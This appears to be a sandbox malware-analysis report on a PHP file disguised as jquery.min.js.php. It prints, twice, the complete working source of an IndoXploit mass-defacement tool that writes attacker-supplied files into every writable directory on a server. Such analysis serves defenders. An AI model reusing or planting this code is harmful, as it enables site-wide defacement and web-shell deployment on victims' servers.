PHP Malware Analysis
jquery.min.js.php
md5: 439a9452f461c32dc62a72e92d100a27
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- getcwd (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Original)
Title
- Created By IndoXploit (Deobfuscated, HTML, Original)
URLs
- http://indoxploit.blogspot.co.id/2016/04/tool-mass-deface.html (Deobfuscated, Original)
Deobfuscated PHP code
<?php
// Tu5b0l3d -IndoXploit-
// http://indoxploit.blogspot.co.id/2016/04/tool-mass-deface.html
function bikin_file($namafile, $script)
{
$fp2 = fopen($namafile, "w");
fputs($fp2, $script);
}
function buka_dir($getcwd)
{
if (is_writable($getcwd)) {
$nama = $_POST['nama'];
$script = $_POST['script'];
$a = scandir("{$getcwd}");
foreach ($a as $aa) {
if ($aa == "." | $aa == "..") {
} elseif (is_dir("{$getcwd}/{$aa}")) {
$dir_baru = "{$getcwd}/{$aa}";
if (is_writable($dir_baru)) {
echo "{$dir_baru}/{$nama} <== sukses<br>";
$create_file = bikin_file("{$dir_baru}/{$nama}", "{$script}");
$baa = buka_dir($dir_baru);
} else {
echo "Dir ngk writeable";
}
}
}
} else {
echo "Dir ngk Writeable";
}
}
if ($_POST) {
$cwd = $_POST['dir'];
$coba = buka_dir($cwd);
echo $coba;
} else {
echo "<html>\r\n\t<head>\r\n\t\t<title>Created By IndoXploit</title>\r\n\t</head>\r\n\r\n\t<body>\r\n\t\t\t<center>\r\n\t\t\t\t<font face=\"arial\"><h2>INDO<font color=\"red\">}{</font>PLOIT <br><br>Tool Mass Deface </h2><hr></font>\r\n\t\t\t\t\t\t<table>\r\n\t\t\t\t\t\t\t<tr><td><form method=\"post\" action=\"?action\"></td></tr>\r\n\t\t\t\t\t\t\t<tr><td><input type=\"text\" name=\"dir\" placeholder=\"Dir\"></td> </tr>\r\n\t\t\t\t\t\t\t<tr><td><input type=\"text\" name=\"nama\" placeholder=\"k.php / Nama Filenya\"></td> </tr>\r\n\t\t\t\t\t\t\t<tr><td><textarea rows=\"10\" cols=\"19px\" name=\"script\" placeholder=\"Hacked By Tu5b0l3d / Script\"></textarea></td></tr>\r\n\r\n\t\t\t\t\t\t\t<br><tr><td><input type=\"submit\" value=\"Submit\"></td></tr>\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t<font color=\"red\">*nb: gw saranin jangan tebas index.</font>\r\n\t\t\t</center>\r\n\r\n\t</body>\r\n</html>";
}Execution traces
data/traces/439a9452f461c32dc62a72e92d100a27_trace-1676246352.8568.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:59:38.754595]
1 0 1 0.000158 393576
1 3 0 0.000254 401304 {main} 1 /var/www/html/uploads/jquery.min.js.php 0 0
1 3 1 0.000274 401304
0.000301 319912
TRACE END [2023-02-12 21:59:38.754769]
Generated HTML code
<html><head>
<title>Created By IndoXploit</title>
</head>
<body>
<center>
<font face="arial"><h2>INDO<font color="red">}{</font>PLOIT <br><br>Tool Mass Deface </h2><hr></font>
<br><table>
<tbody><tr><td><form method="post" action="?action"></form></td></tr>
<tr><td><input type="text" name="dir" placeholder="Dir"></td> </tr>
<tr><td><input type="text" name="nama" placeholder="k.php / Nama Filenya"></td> </tr>
<tr><td><textarea rows="10" cols="19px" name="script" placeholder="Hacked By Tu5b0l3d / Script"></textarea></td></tr>
<tr><td><input type="submit" value="Submit"></td></tr>
</tbody></table>
<font color="red">*nb: gw saranin jangan tebas index.</font>
</center>
</body></html>Original PHP code
<?php
// Tu5b0l3d -IndoXploit-
// http://indoxploit.blogspot.co.id/2016/04/tool-mass-deface.html
function bikin_file($namafile,$script){
$fp2 = fopen($namafile,"w");
fputs($fp2,$script);
}
function buka_dir($getcwd){
if(is_writable($getcwd)){
$nama = $_POST['nama'];
$script = $_POST['script'];
$a = scandir("$getcwd");
foreach($a as $aa){
if($aa == "." | $aa == ".."){
}elseif(is_dir("$getcwd/$aa")){
$dir_baru = "$getcwd/$aa";
if(is_writable($dir_baru)){
echo "$dir_baru/$nama <== sukses<br>";
$create_file = bikin_file("$dir_baru/$nama", "$script");
$baa = buka_dir($dir_baru);
}
else{
echo "Dir ngk writeable";
}
}
}
}
else{
echo "Dir ngk Writeable";
}
}
if($_POST){
$cwd = $_POST['dir'];
$coba = buka_dir($cwd);
echo $coba;
}
else{
echo '<html>
<head>
<title>Created By IndoXploit</title>
</head>
<body>
<center>
<font face="arial"><h2>INDO<font color="red">}{</font>PLOIT <br><br>Tool Mass Deface </h2><hr></font>
<table>
<tr><td><form method="post" action="?action"></td></tr>
<tr><td><input type="text" name="dir" placeholder="Dir"></td> </tr>
<tr><td><input type="text" name="nama" placeholder="k.php / Nama Filenya"></td> </tr>
<tr><td><textarea rows="10" cols="19px" name="script" placeholder="Hacked By Tu5b0l3d / Script"></textarea></td></tr>
<br><tr><td><input type="submit" value="Submit"></td></tr>
</form>
</table>
<font color="red">*nb: gw saranin jangan tebas index.</font>
</center>
</body>
</html>';
}
?>